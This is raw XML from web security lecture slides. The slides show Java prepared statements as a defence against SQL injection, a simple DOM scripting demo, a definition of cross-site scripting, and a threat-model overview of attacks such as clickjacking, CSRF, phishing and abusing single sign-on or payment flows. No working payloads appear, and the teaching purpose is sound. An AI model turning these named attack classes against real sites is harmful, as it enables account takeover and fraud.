                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r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 "UPDATE players SET name = ?, score = ?,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>                 active = ? WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>jerseyNum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> = ?"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>)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r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>//automatically sanitizes and adds quotes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p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err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>query.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>setString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>, "Smith, Steve"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>query.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>setInt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>42)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>query.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>setBoolean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>true</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>query.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>setInt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>99)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" i="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" i="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>returns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" i="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" i="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" i="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" i="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>number</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" i="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" i="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" i="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" i="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>rows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" i="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" i="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>changed</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>query.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>executeUpdate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty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7160442" y="2667000"/>
            <a:ext cx="1907358" cy="1752600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -154013"/>
              <a:gd name="adj2" fmla="val 18818"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="28575" cap="flat" cmpd="sng"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Similar methods for other SQL types</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Right Brace 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4953000" y="3352800"/>
            <a:ext cx="228600" cy="1066800"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace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Snip and Round Single Corner Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="5638623"/>
            <a:ext cx="8229600" cy="990777"/>
          </a:xfrm>
          <a:prstGeom prst="snip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Prepared queries stop us from mixing data with code!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill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67674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429000"/>
            <a:ext cx="3581400" cy="838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en-US" dirty="0"/>
              <a:t>Code for the worst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493324"/>
            <a:ext cx="3987800" cy="3911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43400" y="5574268"/>
            <a:ext cx="1167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Database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50615" y="5574268"/>
            <a:ext cx="155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Programmer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1120817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Site Scripting (XSS)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Document Object Model</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cookies and Sessions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>XSS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207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Browser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543800" cy="4754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Window or frame loads content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Renders content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Parse HTML, scripts, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Run scripts, plugins, etc.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Responds to events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Event examples</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User actions: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>OnClick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>OnMouseover</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Rendering: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>OnLoad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>OnBeforeUnload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>onerror</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Timing: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>setTimeout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(),  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>clearTimeout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>()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33220" y="1718235"/>
            <a:ext cx="760258" cy="1592861"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 732192 w 760258"/>
              <a:gd name="connsiteY0" fmla="*/ 1538941 h 1592861"/>
              <a:gd name="connsiteX1" fmla="*/ 672427 w 760258"/>
              <a:gd name="connsiteY1" fmla="*/ 1509059 h 1592861"/>
              <a:gd name="connsiteX2" fmla="*/ 74 w 760258"/>
              <a:gd name="connsiteY2" fmla="*/ 747059 h 1592861"/>
              <a:gd name="connsiteX3" fmla="*/ 717251 w 760258"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 1592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0258" h="1592861">
                <a:moveTo>
                  <a:pt x="732192" y="1538941"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="763319" y="1589990"/>
                  <a:pt x="794447" y="1641039"/>
                  <a:pt x="672427" y="1509059"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="550407" y="1377079"/>
                  <a:pt x="-7397" y="998569"/>
                  <a:pt x="74" y="747059"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7545" y="495549"/>
                  <a:pt x="717251" y="0"/>
                  <a:pt x="717251" y="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879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Object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22694" y="3796365"/>
            <a:ext cx="18288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document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141694" y="459408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856194" y="459408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body</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Straight Arrow Connector 10"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="7" idx="2"/>
            <a:endCxn id="8" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4636994" y="4177365"/>
            <a:ext cx="800100" cy="416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0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5437095" y="4177364"/>
            <a:ext cx="914399" cy="416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  <a:endCxn id="19" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3646394" y="4975084"/>
            <a:ext cx="990600" cy="246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51094" y="522154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title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95241" y="5221544"/>
            <a:ext cx="533401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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="31" name="Straight Arrow Connector 30"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="9" idx="2"/>
            <a:endCxn id="27" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6351494" y="4975084"/>
            <a:ext cx="810448" cy="246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9" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3379694" y="5602544"/>
            <a:ext cx="266700" cy="44172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2"/>
            <a:endCxn id="41" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7161942" y="5602544"/>
            <a:ext cx="19909" cy="4573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515102" y="6059893"/>
            <a:ext cx="1333498" cy="3230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Alice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61950" y="4177364"/>
            <a:ext cx="2381250" cy="1842436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parse tree that is dynamically updated</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Snip Single Corner Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="826994" y="1447800"/>
            <a:ext cx="7620000" cy="1600200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tIns="0" rtlCol="0" anchor="t" anchorCtr="0"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&lt;html&gt;&lt;body&gt;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&lt;head&gt;&lt;title&gt;Example&lt;/title&gt; ... &lt;/head&gt;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&lt;body&gt;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&lt;a id="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myid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"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href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="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javascript:flipText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()"&gt;Alice&lt;/a&gt;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&lt;/body&gt;&lt;/html&gt;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41390" y="522154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</a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="32" name="Straight Arrow Connector 31"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="8" idx="2"/>
            <a:endCxn id="30" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4636994" y="4975084"/>
            <a:ext cx="699696" cy="246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0" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5069990" y="5602544"/>
            <a:ext cx="266700" cy="44172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3319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nip Single Corner Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="279522" y="1139362"/>
            <a:ext cx="7620000" cy="4904903"/>
          </a:xfrm>
          <a:prstGeom prst="snip1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tIns="0" rtlCol="0" anchor="t" anchorCtr="0"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&lt;head&gt; ...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&lt;script type="text/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javascript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"&gt;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flip = 0;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function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flipText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() {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var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x =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document.getElementById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('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myid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').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firstChild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 if(flip == 0) {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x.nodeValue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= 'Bob'; flip = 1;}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 else {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x.nodeValue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= 'Alice'; flip = 0; }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}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&lt;/script&gt;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&lt;/head&gt;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&lt;body&gt;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&lt;a id="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myid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" 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href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="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>javascript:flipText</a:t>
            </a:r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()"&gt;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   Alice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&lt;/a&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;/body&gt;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Object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A05C-7D88-9E4B-B6AC-1CE35ACF5DD7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257800" y="3796365"/>
            <a:ext cx="18288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document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76800" y="459408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91300" y="459408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body</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Straight Arrow Connector 10"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="7" idx="2"/>
            <a:endCxn id="8" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5372100" y="4177365"/>
            <a:ext cx="800100" cy="416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0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6172201" y="4177364"/>
            <a:ext cx="914399" cy="416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7630347" y="5221544"/>
            <a:ext cx="533401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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="31" name="Straight Arrow Connector 30"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="9" idx="2"/>
            <a:endCxn id="27" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7086600" y="4975084"/>
            <a:ext cx="810448" cy="246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2"/>
            <a:endCxn id="41" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7897048" y="5602544"/>
            <a:ext cx="19909" cy="4622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7250208" y="6064790"/>
            <a:ext cx="1333498" cy="3230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Alice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576496" y="5221544"/>
            <a:ext cx="990600" cy="381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script</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="32" name="Straight Arrow Connector 31"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="8" idx="2"/>
            <a:endCxn id="30" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5372100" y="4975084"/>
            <a:ext cx="699696" cy="2464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0" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5753100" y="5602544"/>
            <a:ext cx="318696" cy="462246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086351" y="6064790"/>
            <a:ext cx="1333498" cy="32305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flipText</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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1600200" y="5791200"/>
            <a:ext cx="2514600" cy="645714"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 87990"/>
              <a:gd name="adj2" fmla="val 20094"/>
              <a:gd name="adj3" fmla="val 16667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Edits “Alice” to be “Bob”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28143640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u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cross site scripting (XSS)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is the ability to get a website to display </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>user-supplied</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> content laced with malicious HTML/JavaScript”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0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5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575045"/>
            <a:ext cx="1600200" cy="23042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091952"/>
            <a:ext cx="2182611" cy="1270475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3162300" y="2360624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162300" y="2727189"/>
            <a:ext cx="28194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68209" y="3159921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Server Attacking Client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Clickjacking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36" y="5507782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History Probing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Phishing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="286703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6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719488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153769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819400" y="242244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819400" y="278900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05372" y="2973460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5059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User Attacking Other Users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105400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Cross-Site Scripting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507782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Cross-Site Request Forgery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7884" y="5958994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Remote Script Inclusion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565079" y="2150211"/>
            <a:ext cx="1905372" cy="1109097"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="29" name="Straight Arrow Connector 28"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5410200" y="232555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410200" y="2690819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584698" y="3212956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19182" y="2992249"/>
            <a:ext cx="1102102" cy="110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1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7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448" y="2019250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171709" y="228309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17170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58272" y="3102848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7248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Server in “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1"/>
              <a:t>Mashup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>” Web Application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324286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Clickjacking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36" y="57266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Information Stealing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86459" y="2284388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88645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63678" y="3226552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53000" y="3161397"/>
            <a:ext cx="1102102" cy="110210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151" y="1752600"/>
            <a:ext cx="1240078" cy="178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7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Security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1052927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(By Threat Model)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752600"/>
            <a:ext cx="1240078" cy="17857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448" y="2019250"/>
            <a:ext cx="1905372" cy="1109097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2171709" y="2283091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17170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67259" y="3161397"/>
            <a:ext cx="1219200" cy="12192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0" y="47248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Malicious User in Multi-Server Application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1" y="5324286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Single sign-on (Facebook, Twitter, etc.)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Sign in as someone else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36" y="572666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Multi-Party Payment (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Paypal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>, Amazon Payments):</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Buy things for free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5886459" y="2284388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886459" y="2649656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63678" y="3226552"/>
            <a:ext cx="1102102" cy="11021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5422" y="3265511"/>
            <a:ext cx="1102102" cy="110210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151" y="1752600"/>
